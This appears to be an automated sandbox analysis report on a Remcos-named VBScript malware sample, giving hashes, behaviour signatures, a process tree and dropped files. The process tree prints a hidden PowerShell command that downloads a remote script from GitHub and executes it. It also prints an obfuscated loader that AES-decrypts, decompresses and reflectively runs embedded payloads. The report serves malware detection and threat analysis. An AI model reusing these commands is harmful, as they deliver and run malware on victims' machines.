Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-12-2024 22:37
Static task
static1
Behavioral task
behavioral1
Sample
remcos.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
remcos.vbs
Resource
win10v2004-20241007-en
General
-
Target
remcos.vbs
-
Size
563KB
-
MD5
f7c17bfb4247e64e22dd52540a4b903b
-
SHA1
368ba4d02df294fa42efee5e4f330d5e7260d0c3
-
SHA256
23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
-
SHA512
5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
-
SSDEEP
12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid Process 2692 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 3040 powershell.exe 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.execmd.execmd.exedescription pid Process procid_target PID 2096 wrote to memory of 3040 2096 WScript.exe 31 PID 2096 wrote to memory of 3040 2096 WScript.exe 31 PID 2096 wrote to memory of 3040 2096 WScript.exe 31 PID 2096 wrote to memory of 2728 2096 WScript.exe 33 PID 2096 wrote to memory of 2728 2096 WScript.exe 33 PID 2096 wrote to memory of 2728 2096 WScript.exe 33 PID 2728 wrote to memory of 2628 2728 cmd.exe 35 PID 2728 wrote to memory of 2628 2728 cmd.exe 35 PID 2728 wrote to memory of 2628 2728 cmd.exe 35 PID 2628 wrote to memory of 2680 2628 cmd.exe 37 PID 2628 wrote to memory of 2680 2628 cmd.exe 37 PID 2628 wrote to memory of 2680 2628 cmd.exe 37 PID 2628 wrote to memory of 2692 2628 cmd.exe 38 PID 2628 wrote to memory of 2692 2628 cmd.exe 38 PID 2628 wrote to memory of 2692 2628 cmd.exe 38 PID 2628 wrote to memory of 2692 2628 cmd.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\remcos.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "4⤵PID:2680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
562KB
MD5d1d99208a499e870e1e0a34a2cbba829
SHA185f7090ce76bdae0a07154b27117ec5ac9e9f673
SHA256d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879
SHA512badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1KXKH7S10596SZ5GLS6N.temp
Filesize7KB
MD5d85e846afd2fcf5dde2fbbeabbfff705
SHA10c52f9c7bca9203333e2cf2e6d26c252f8322dda
SHA2566d477eb4b026c67a9c935713e33980cd13898e2685e888deaccf49add312b6c0
SHA512b7fe93ced3a42641795915730d8e614acde8aa536efa42c90de34b52ab40c2f75260d4ad5f3ad7d081dc5b24030dc135754234cde38075261542de93ec4fef9d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e